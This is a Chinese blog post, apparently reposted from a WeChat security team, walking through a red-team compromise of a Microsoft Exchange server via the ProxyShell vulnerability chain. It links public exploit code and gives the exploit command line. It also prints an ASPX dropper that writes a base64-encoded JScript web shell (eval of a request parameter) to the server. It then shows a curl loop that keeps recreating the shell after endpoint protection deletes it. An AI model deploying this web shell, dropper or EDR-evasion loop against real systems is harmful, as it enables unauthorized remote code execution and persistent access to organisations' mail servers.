由于最近几个月忙着hw没时间写更新,现在闲下来了写写hw的时候遇到有趣的一些漏洞。
在一次市级hw中遇到CVE-2021-34473,edr+杀软绕的我好辛苦。
这个exchange是需要配合这三个漏洞组合getshell的:
CVE-2021-34473 Microsoft Exchange ACL绕过漏洞
CVE-2021-34523 Microsoft Exchange权限提升漏洞
CVE-2021-31207 Microsoft Exchange授权任意文件写入漏洞
漏洞影响范围:
Microsoft
Exchange Server 2010
Microsoft
Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft
Exchange Server 2019
复现流程:
首先使用SSRF漏洞,请求AutoDiscover服务,获取legacyDn
将legacyDn作为参数,访问mapi/emsmdb接口,能够获得用户对应的sid
在Header中使用SerializedSecurityContext,指定用户身份进行EWS调用操作
https:
//github.com/Ridter/proxyshell_payload
https:
//github.com/dmaasland/proxyshell-poc
python
proxyshell_rce.py -u https://xx.xxx.xx/ e administrator
@xxx
.xx
Get-MailboxExportRequest
Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$
false
dropshell
<
%@
Page
Language
=
"C#"
%>
<
html
>
<
head
>
</
head
>
<
body
>
<
%string
filePath
=
Server.MapPath(
"
.
/
123.aspx
");
string
base64Content
=
"PHNjcmlwdCBsYW5ndWFnZT0nSlNjcmlwdCcgcnVuYXQ9J3NlcnZlcicgUGFnZSBhc3Bjb21wYXQ9dHJ1ZT5mdW5jdGlvbiBQYWdlX0xvYWQoKXtldmFsKFJlcXVlc3RbJ3RhbmdhbnQnXSwndW5zYWZlJyk7fTwvc2NyaXB0PgoK"
;
byte
[]
contentBytes
=
System.Convert.FromBase64String(base64Content);string
content
=
System.Text.Encoding.UTF8.GetString(contentBytes);System.IO.File.WriteAllText(filePath,content);%
>
<
h1
>
success
</
h1
>
</
body
>
</
html
>
内容就是在
aspx
文件根目录生成一个文件内容是123
.aspx
PHNjcmlwdCBsYW5ndWFnZT0nSlNjcmlwdCcgcnVuYXQ9J3NlcnZlcicgUGFnZSBhc3Bjb21wYXQ9dHJ1ZT5mdW5jdGlvbiBQYWdlX0xvYWQoKXtldmFsKFJlcXVlc3RbJ3RhbmdhbnQnXSwndW5zYWZlJyk7fTwvc2NyaXB0PgoK
利用
base64
解密写入123
.aspx
<
script
language
=
'JScript'
runat
=
'server'
Page
aspcompat
=
true
>
function
Page_Load
(
)
{
eval
(Request[
'tangant'
],
'unsafe'
);}
</
script
>
由于时间有点晚了,就睡觉了
结果第二天醒来,全部404!但是漏洞还没有修复!
然后重新上传了,发现还能用,但是没过一分钟马子就被删除了,猜测运维是安装了杀软+edr。真的要命啊,一hw基本上都是edr~
冷静,想了想虽然过一分钟就删除马子,那我们是不是可以一直访问上传马子的链接就可以一直生成马了,相当于不死马的一样。
然后写一个sh脚本挂在服务器上一直访问那个链接
while
true
do
curl -ki https://xxxx.xxx//aspnet_client/ixxxot.aspx
done
原文始发于微信公众号(哈拉少安全小队):实战|记一次攻防Exchange艰难getshell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论